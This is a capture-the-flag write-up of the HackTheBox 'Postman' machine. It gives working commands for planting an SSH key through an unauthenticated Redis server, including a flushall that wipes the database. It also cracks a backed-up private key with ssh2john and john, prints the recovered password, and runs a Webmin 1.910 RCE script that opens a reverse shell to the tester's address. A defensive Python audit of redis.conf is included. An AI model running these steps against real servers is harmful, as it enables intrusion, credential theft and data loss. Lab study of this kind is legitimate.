hackthebox - postman (key points: Redis security & ssh2john & Webmin security)

1 Scanning

Port 22 suggests we may be able to log in over SSH.
Port 80 is a web server; gather information there, including directory scanning with dirbuster, but nothing of value turned up.
Port 10000 is Webmin, a remote administration system. No credentials for it either.

Port 6379 is the Redis service; there is plenty of background material on it online.
In theory this is a database tool meant to run in a trusted internal environment and should not be exposed externally. Since it is exposed, it may well be the entry point, and it may not even require password authentication. The client tooling can be installed with apt install redis-tools.

Scanning 1 hosts [131070 ports/host]
Discovered open port 10000/tcp on 10.10.10.160                                 
Discovered open port 6379/tcp on 10.10.10.160                                  
Discovered open port 80/tcp on 10.10.10.160                                    
Discovered open port 10000/udp on 10.10.10.160                                 
Discovered open port 22/tcp on 10.10.10.160    


Nmap scan report for 10.10.10.160
Host is up (0.25s latency).

PORT      STATE SERVICE
6379/tcp  open  redis


2 Exploiting Redis

Found a walkthrough for this online and followed its steps for Redis:
first confirm that there is no password authentication and the server can be accessed directly, then generate an SSH key pair, store the public key in Redis, and have Redis write it out so that SSH login works directly.
Of course, the directory is different here, so it needs slight adjustment.

C:\root> telnet 10.10.10.160 6379
Trying 10.10.10.160...
Connected to 10.10.10.160.
Escape character is '^]'.
echo "hey"
$3
hey
quit
+OK
Connection closed by foreign host.
C:\root> ssh-keygen -t rsa -C "crack@redis.io"
Generating public/private rsa key pair.
Enter file in which to save the key (/root/.ssh/id_rsa): ./id_rsa
Enter passphrase (empty for no passphrase): 
Enter same passphrase again: 
Your identification has been saved in ./id_rsa.
Your public key has been saved in ./id_rsa.pub.
The key fingerprint is:
SHA256:wYLTy+zxSCYXHb47wx1yjRVTmx+pPfJO+9gkRTrUlS8 crack@redis.io
The key's randomart image is:
+---[RSA 3072]----+
|        .   o.. o|
|     o + .   o =o|
|    o + =   . +o+|
|     + + o + .E+o|
|    . O S + .oo+o|
|     * = = .  oo.|
|      o * .   .o.|
|         o    o=.|
|              .o+|
+----[SHA256]-----+

C:\root> (echo -e "\n\n"; cat id_rsa.pub; echo -e "\n\n") > foo.txt
C:\root> redis-cli -h 10.10.10.160 flushall
OK
C:\root> cat foo.txt | redis-cli -h 10.10.10.160 -x set crackit
OK
C:\root> redis-cli -h 10.10.10.160
10.10.10.160:6379> get crackit
"\n\n\nssh-rsa ... crack@redis.io\n\n\n\n"
10.10.10.160:6379> config get dir
1) "dir"
2) "/var/lib/redis/.ssh"
10.10.10.160:6379> config set dir /var/lib/redis/.ssh
OK
10.10.10.160:6379> config set dbfilename "authorized_keys"
OK
10.10.10.160:6379> save
OK
10.10.10.160:6379> exit
C:\root> 

Once the save succeeds, log in over SSH:

ssh -i id_rsa redis@10.10.10.160
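As an added defender-side example (not code from the original post): a small audit of a redis.conf for exactly the conditions this section relies on: the service bound to all interfaces, protected-mode off, no requirepass, and CONFIG/FLUSHALL still callable under their default names. Both configuration fragments are constructed samples, not the box's real config.

```python
# Constructed sample redis.conf fragments (not taken from the box).
WEAK_CONF = """\
bind 0.0.0.0
protected-mode no
# requirepass foobared
dir /var/lib/redis
"""

HARDENED_CONF = """\
bind 127.0.0.1 ::1
protected-mode yes
requirepass <strong-password-here>
rename-command CONFIG ""
rename-command FLUSHALL ""
dir /var/lib/redis
"""


def parse_conf(text):
    """Return active (non-comment) directives as {name: [value, ...]}."""
    conf = {}
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue  # blank or commented-out directive
        name, _, rest = line.partition(" ")
        conf.setdefault(name.lower(), []).append(rest.strip())
    return conf


def audit_redis_conf(text):
    """List the settings that let an anonymous client turn SAVE into a file write."""
    conf = parse_conf(text)
    findings = []
    # Redis without a bind directive listens on every interface.
    binds = conf.get("bind", ["0.0.0.0"])[-1].split()
    if any(b in ("0.0.0.0", "*", "::") for b in binds):
        findings.append("bind: listening on all interfaces")
    if conf.get("protected-mode", ["yes"])[-1].lower() != "yes":
        findings.append("protected-mode: disabled")
    if "requirepass" not in conf or conf["requirepass"][-1] in ("", '""'):
        findings.append("requirepass: not set (no authentication)")
    # rename-command values look like: CONFIG ""  (empty name disables the command)
    renamed = {v.split()[0].upper() for v in conf.get("rename-command", []) if v.split()}
    for cmd in ("CONFIG", "FLUSHALL"):
        if cmd not in renamed:
            findings.append(f"{cmd}: still reachable under its default name")
    return findings
```

Run `audit_redis_conf(WEAK_CONF)` to see the five findings that describe this box; the hardened fragment produces none.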

3 Privilege escalation to Matt

The linpeas scanner found nothing of value.
You can switch to the LinEnum script instead,
or look around manually.
Found /opt/id_rsa.bak, which is readable and owned by the user Matt.

redis@Postman:/etc/redis$ find / -type f -user Matt -readable 2>/dev/null
/opt/id_rsa.bak
/home/Matt/.bashrc
/home/Matt/.selected_editor
/home/Matt/.profile
/home/Matt/.wget-hsts
/home/Matt/.bash_logout
/var/www/SimpleHTTPPutServer.py
redis@Postman:/etc/redis$ 

Opening it shows a passphrase-protected SSH private key (id_rsa).
Use ssh2john to convert it into john's hash format, then crack it with john. Kali 2020 does not seem to ship this tool by default, but the Python script is included in the john package.

That gives us Matt's password. su Matt gets us his shell.

C:\root> locate ssh2john 
/root/.local/share/Trash/files/JohnTheRipper/run/ssh2john.py
/root/exp/JohnTheRipper-bleeding-jumbo/run/ssh2john.py
/usr/share/john/ssh2john.py
C:\root> 

C:\root\htb\postman> python /root/exp/JohnTheRipper-bleeding-jumbo/run/ssh2john.py id_rsa > postman
C:\root\htb\postman>

C:\root\exp\JohnTheRipper-bleeding-jumbo\run> ./john postman --wordlist=/usr/share/wordlists/rockyou.txt
Note: This format may emit false positives, so it will keep trying even after finding a
possible candidate.
Using default input encoding: UTF-8
Loaded 1 password hash (SSH [RSA/DSA/EC/OPENSSH (SSH private keys) 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 1 for all loaded hashes
Cost 2 (iteration count) is 2 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
computer2008     (?)
1g 0:00:00:07 DONE (2020-05-20 22:54) 0.1358g/s 1948Kp/s 1948Kc/s 1948KC/sa6_123..*7¡Vamos!
Session completed. 
C:\root\exp\JohnTheRipper-bleeding-jumbo\run> 


4 Privilege escalation to root (via Webmin)

Webmin has not been used yet. It has many known vulnerabilities, including RCE that yields a shell directly, but most of them require authentication, i.e. you need valid credentials.
That raises the question of password reuse, for example Matt's credentials. Trying them: login succeeded.

The version shown is 1.910.

Searching GitHub for "webmin rce" turns up the relevant exploits; pick the one matching this version. There are two Python scripts; one of them seems to require converting Perl and base64 payloads by hand, which looks tedious, so choose the simpler one.

Run:

python webmin.py https://10.10.10.160:10000 Matt computer2008 10.10.14.43 1337

The listener on the local machine receives the connection, and we have root.
